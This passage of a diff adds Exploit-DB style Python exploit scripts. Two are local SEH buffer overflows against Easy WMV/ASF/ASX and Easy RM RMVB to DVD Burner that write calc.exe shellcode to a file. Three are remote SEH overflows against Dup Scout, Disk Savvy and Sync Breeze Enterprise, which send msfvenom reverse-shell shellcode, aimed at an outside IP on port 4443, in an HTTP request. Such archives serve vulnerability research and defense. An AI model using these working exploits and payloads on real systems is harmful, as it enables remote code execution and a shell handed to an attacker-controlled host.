+"\x52\x83\xc2\x04\x31\x7a\x13\x03\xad\xeb\xd7\x60\xad\xe4\x9a"
+"\x8b\x4d\xf5\xfa\x02\xa8\xc4\x3a\x70\xb9\x77\x8b\xf2\xef\x7b"
+"\x60\x56\x1b\x0f\x04\x7f\x2c\xb8\xa3\x59\x03\x39\x9f\x9a\x02"
+"\xb9\xe2\xce\xe4\x80\x2c\x03\xe5\xc5\x51\xee\xb7\x9e\x1e\x5d"
+"\x27\xaa\x6b\x5e\xcc\xe0\x7a\xe6\x31\xb0\x7d\xc7\xe4\xca\x27"
+"\xc7\x07\x1e\x5c\x4e\x1f\x43\x59\x18\x94\xb7\x15\x9b\x7c\x86"
+"\xd6\x30\x41\x26\x25\x48\x86\x81\xd6\x3f\xfe\xf1\x6b\x38\xc5"
+"\x88\xb7\xcd\xdd\x2b\x33\x75\x39\xcd\x90\xe0\xca\xc1\x5d\x66"
+"\x94\xc5\x60\xab\xaf\xf2\xe9\x4a\x7f\x73\xa9\x68\x5b\xdf\x69"
+"\x10\xfa\x85\xdc\x2d\x1c\x66\x80\x8b\x57\x8b\xd5\xa1\x3a\xc4"
+"\x1a\x88\xc4\x14\x35\x9b\xb7\x26\x9a\x37\x5f\x0b\x53\x9e\x98"
+"\x6c\x4e\x66\x36\x93\x71\x97\x1f\x50\x25\xc7\x37\x71\x46\x8c"
+"\xc7\x7e\x93\x03\x97\xd0\x4c\xe4\x47\x91\x3c\x8c\x8d\x1e\x62"
+"\xac\xae\xf4\x0b\x47\x55\x9f\xf3\x30\x57\x36\x9c\x42\x57\xc9"
+"\xe7\xca\xb1\xa3\x07\x9b\x6a\x5c\xb1\x86\xe0\xfd\x3e\x1d\x8d"
+"\x3e\xb4\x92\x72\xf0\x3d\xde\x60\x65\xce\x95\xda\x20\xd1\x03"
+"\x72\xae\x40\xc8\x82\xb9\x78\x47\xd5\xee\x4f\x9e\xb3\x02\xe9"
+"\x08\xa1\xde\x6f\x72\x61\x05\x4c\x7d\x68\xc8\xe8\x59\x7a\x14"
+"\xf0\xe5\x2e\xc8\xa7\xb3\x98\xae\x11\x72\x72\x79\xcd\xdc\x12"
+"\xfc\x3d\xdf\x64\x01\x68\xa9\x88\xb0\xc5\xec\xb7\x7d\x82\xf8"
+"\xc0\x63\x32\x06\x1b\x20\x42\x4d\x01\x01\xcb\x08\xd0\x13\x96"
+"\xaa\x0f\x57\xaf\x28\xa5\x28\x54\x30\xcc\x2d\x10\xf6\x3d\x5c"
+"\x09\x93\x41\xf3\x2a\xb6")
+padding = "\x44"*(1000-351)
+f = open ("exploit.txt", "w")
+f.write(buffer + nSEH + SEH + junk + shellcode + padding)
+f.close()

platforms/windows/local/42567.py

@@ -0,0 +1,61 @@
+#!/usr/bin/python
+
+#========================================================================================================================
+# Exploit Author:       Touhid M.Shaikh
+# Exploit Title:        Easy WMV/ASF/ASX to DVD Burner 2.3.11 - 'Enter User
+Name' Field Buffer Overflow (SEH)
+# Date:                 28-08-2017
+# Website:       www.touhidshaikh.com
+# Vulnerable Software:  Easy WMV/ASF/ASX to DVD Burner
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              2.3.11
+# Software Link:        http://www.divxtodvd.net/easy_wmv_to_dvd.exe
+# Tested On:            Windows 7 x86
+#
+#
+# To reproduce the exploit:
+#   1. Click Register
+#   2. In the "Enter User Name" field, paste the content of calc.txt
+#
+#========================================================================================================================
+
+
+buffer = "\x41" * 1008
+
+nSEH = "\xeb\x10\x90\x90"
+
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
+[SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+
+nops = "\x90" * 16
+
+data = buffer + nSEH + SEH + nops + buf
+
+f = open ("calc.txt", "w")
+f.write(data)
+f.close()
+
+#Greetz => Jack Carlo

platforms/windows/local/42568.py

@@ -0,0 +1,62 @@
+#!/usr/bin/python
+
+#========================================================================================================================
+# Exploit Author     :  Touhid M.Shaikh
+# Exploit Title      : Easy RM RMVB to DVD Burner 1.8.11 - 'Enter User
+Name' Field Buffer Overflow (SEH)
+# Date :  28-08-2017
+# Website : www.touhidshaikh.com
+# Contact : https://github.com/touhidshaikh
+# Vulnerable Software:  Easy RM RMVB to DVD Burner
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              1.8.11
+# Software Link:        http://www.divxtodvd.net/easy_rm_to_dvd.exe
+# Tested On:            Windows 7 x86
+#
+#
+# To reproduce the exploit:
+#   1. Click Register
+#   2. In the "Enter User Name" field, paste the content of calc.txt
+#
+#========================================================================================================================
+
+
+buffer = "\x41" * 1008
+
+nSEH = "\xeb\x10\x90\x90"
+
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
+[SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf =  ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+
+nops = "\x90" * 16
+
+data = buffer + nSEH + SEH + nops + buf
+
+f = open ("calc.txt", "w")
+f.write(data)
+f.close()
+
+#Greetz => Jack Carlo

platforms/windows/remote/42557.py

@@ -0,0 +1,96 @@
+#!/usr/bin/env python
+# Exploit Title: Dup Scout Enterprise v 9.9.14
+# Date: 2017-08-25
+# Exploit Author: Nipun Jaswal & Anurag Srivastava
+# Author Homepage: www.pyramidcyber.com
+# Vendor Homepage: http://www.dupscout.com
+# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v9.9.14.exe
+# Version: v9.9.14
+# Tested on: Windows 7 SP1 x64
+# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
+import socket,sys
+target = "127.0.0.1"
+port = 8080
+
+#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
+buf =  ""
+buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
+buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
+buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
+buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
+buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
+buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
+buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
+buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
+buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
+buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
+buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
+buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
+buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
+buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
+buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
+buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
+buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
+buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
+buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
+buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
+buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
+buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
+buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
+buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
+buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
+buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
+buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
+buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
+buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
+buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
+buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
+buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
+buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
+buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
+buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
+buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
+buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
+buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
+buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
+buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
+buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
+buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
+buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
+buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
+buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
+buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
+buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
+buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
+buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
+buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
+buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"
+
+
+payload = buf # Shellcode begins from the start of the buffer
+payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
+payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
+payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
+payload += '\x90' * 10 # NOPsled
+payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
+payload += 'D' * (5000-len(payload)) # Additional Padding
+
+s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+    s.connect((target,port))
+    print "[*] Connection Success."
+except:
+    print "Connction Refused %s:%s" %(target,port)
+    sys.exit(2)
+    
+packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
+packet += "Host: 4.2.2.2\r\n"
+packet += "Connection: keep-alive\r\n"
+packet += "Referer: http://pyramidcyber.com\r\n"
+packet += "\r\n"
+s.send(packet)
+s.close()

platforms/windows/remote/42558.py

@@ -0,0 +1,96 @@
+#!/usr/bin/env python
+# Exploit Title: Disk Savvy Enterprise 9.9.14 Remote SEH Buffer Overflow
+# Date: 2017-08-25
+# Exploit Author: Nipun Jaswal & Anurag Srivastava
+# Author Homepage: www.pyramidcyber.com
+# Vendor Homepage: http://www.disksavvy.com
+# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v9.9.14.exe
+# Version: v9.9.14
+# Tested on: Windows 7 SP1 x64
+# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
+import socket,sys
+target = "127.0.0.1"
+port = 8080
+
+#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
+buf =  ""
+buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
+buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
+buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
+buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
+buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
+buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
+buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
+buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
+buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
+buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
+buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
+buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
+buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
+buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
+buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
+buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
+buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
+buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
+buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
+buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
+buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
+buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
+buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
+buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
+buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
+buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
+buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
+buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
+buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
+buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
+buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
+buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
+buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
+buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
+buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
+buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
+buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
+buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
+buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
+buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
+buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
+buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
+buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
+buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
+buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
+buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
+buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
+buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
+buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
+buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
+buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"
+
+
+payload = buf # Shellcode begins from the start of the buffer
+payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
+payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
+payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
+payload += '\x90' * 10 # NOPsled
+payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
+payload += 'D' * (5000-len(payload)) # Additional Padding
+
+s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+    s.connect((target,port))
+    print "[*] Connection Success."
+except:
+    print "Connction Refused %s:%s" %(target,port)
+    sys.exit(2)
+    
+packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
+packet += "Host: 4.2.2.2\r\n"
+packet += "Connection: keep-alive\r\n"
+packet += "Referer: http://pyramidcyber.com\r\n"
+packet += "\r\n"
+s.send(packet)
+s.close()

platforms/windows/remote/42559.py

@@ -0,0 +1,96 @@
+#!/usr/bin/env python
+# Exploit Title: Sync Breeze Enterprise v9.9.16 Remote SEH Buffer Overflow
+# Date: 2017-08-25
+# Exploit Author: Nipun Jaswal & Anurag Srivastava
+# Author Homepage: www.pyramidcyber.com
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.9.16.exe
+# Version: v9.9.16
+# Tested on: Windows 7 SP1 x64
+# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
+import socket,sys
+target = "127.0.0.1"
+port = 8080
+
+#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
+buf =  ""
+buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
+buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
+buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
+buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
+buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
+buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
+buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
+buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
+buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
+buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
+buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
+buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
+buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
+buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
+buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
+buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
+buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
+buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
+buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
+buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
+buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
+buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
+buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
+buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
+buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
+buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
+buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
+buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
+buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
+buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
+buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
+buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
+buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
+buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
+buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
+buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
+buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
+buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
+buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
+buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
+buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
+buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
+buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
+buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
+buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
+buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
+buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
+buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
+buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
+buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
+buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"
+
+
+payload = buf # Shellcode begins from the start of the buffer
+payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
+payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
+payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
+payload += '\x90' * 10 # NOPsled
+payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
